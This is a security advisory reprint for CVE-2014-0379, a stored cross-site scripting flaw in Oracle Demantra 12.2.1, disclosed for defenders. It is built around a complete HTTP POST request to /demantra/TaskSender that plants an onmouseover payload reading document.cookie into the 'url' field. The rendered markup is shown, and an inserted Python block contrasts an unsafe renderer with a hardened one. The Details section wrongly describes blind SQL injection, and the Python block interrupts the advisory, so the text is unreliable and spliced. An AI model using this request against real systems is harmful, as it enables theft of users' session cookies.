Oracle Demantra 12.2.1 Stored Cross Site Scripting

2014-03-02T00:00:00
ID PACKETSTORM:125486
Type packetstorm
Reporter Oliver Gruskovnjak
Modified 2014-03-02T00:00:00

Description

Vulnerability title: Stored Cross-site Scripting in Oracle Demantra
CVE: CVE-2014-0379  
Vendor: Oracle  
Product: Demantra  
Affected version: 12.2.1  
Fixed version: 12.2.3  
Reported by: Oliver Gruskovnjak  
  
Details:  
  
The Oracle Demantra application is vulnerable to SQL injection.  
  
An attacker with access to the vulnerable pages could manipulate the  
queries being sent to the database, potentially enabling them to extract  
sensitive information or modify content within the application.  
  
In this particular instance, exploitation was more difficult as the
results of the attack had to be inferred from the pages returned, often
referred to as "blind" SQL Injection.
  
Exploit:  
  
Request:  
  
POST /demantra/TaskSender HTTP/1.1  
Host: www.target.com:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://www.target.com:8080/demantra/portal/taskSender.jsp?tkn=187120466014305  
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=201BE9D6A85EA3E4BC837A4F01B9781F  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------12454397315614820331578362291  
Content-Length: 3093  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="selectedUsersVector"  
  
389  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="selectedUserList"  
  
389;  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="message"  
  
asdasda  
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="description"  
  
asdasdasdas  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="url"  
  
aaa"onmouseover="alert(document.cookie)  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="sendEmail"  
  
1  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_dueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_alertTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_dueTimeHours"  
  
14:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_alertTimeHours"  
  
08:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_escalateUserList"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="combination"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="dueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="alertTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="tkn"  
  
187120466014305  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="attachment"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="localizedDueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="dueTimeHours"  
  
14:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="localizedAlertTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="alertTimeHours"  
  
08:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="escalateUserList"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="sendEmailCheckbox"  
  
on  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="x"  
  
50  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="y"  
  
7  
-----------------------------12454397315614820331578362291--  
  
Resulting Code in page:  
  
<!-- Message -->  
  
<td class="columnCellMessage">  
  
<a href="http://aaa"onmouseover="alert(document.cookie)" id="link793546" class="message" target="_blank">  
  
<b>asdasda</b>  
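As an added illustration (not code from the advisory or from Oracle), the rendering pattern implied by the resulting markup above, reconstructed in Python, beside a hardened version that validates the submitted url value and HTML-attribute-encodes everything it interpolates. The anchor template, the function names and the host allow-list are assumptions.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed from the advisory: the value submitted in the "url" form field.
PAYLOAD = 'aaa"onmouseover="alert(document.cookie)'

# Hypothetical host allow-list: hostname characters plus an optional port.
HOST_RE = re.compile(r"[A-Za-z0-9.\-]+(:\d+)?")


def render_link_vulnerable(url, message, link_id="link793546"):
    """Reconstruction of the defect: the field value is prefixed with http://
    and concatenated into the href attribute with no encoding, so a double
    quote in the input closes the attribute and the rest becomes a new one."""
    return ('<a href="http://%s" id="%s" class="message" target="_blank">'
            '<b>%s</b></a>' % (url, link_id, message))


def safe_task_url(url):
    """Return an absolute http(s) URL with a plain hostname, or None.
    Values without a scheme get http:// prefixed (matching the app's
    behaviour); any other scheme or a host containing quotes, parentheses
    or other non-hostname characters is rejected."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return None
    if not HOST_RE.fullmatch(parts.netloc):
        return None
    return url


def render_link_hardened(url, message, link_id="link793546"):
    """Same markup, but the URL is validated first and every interpolated
    value is encoded for its context (quote=True covers attribute values),
    so the attribute cannot be broken out of."""
    target = safe_task_url(url)
    if target is None:
        # Invalid URL: render the message text only, with no link at all.
        return '<b>%s</b>' % html.escape(message)
    return ('<a href="%s" id="%s" class="message" target="_blank">'
            '<b>%s</b></a>' % (html.escape(target, quote=True),
                                 html.escape(link_id, quote=True),
                                 html.escape(message)))
```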
  
  
  
  
Further details at:  
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0379/  
  
  
Copyright:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
  
Disclaimer:  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.  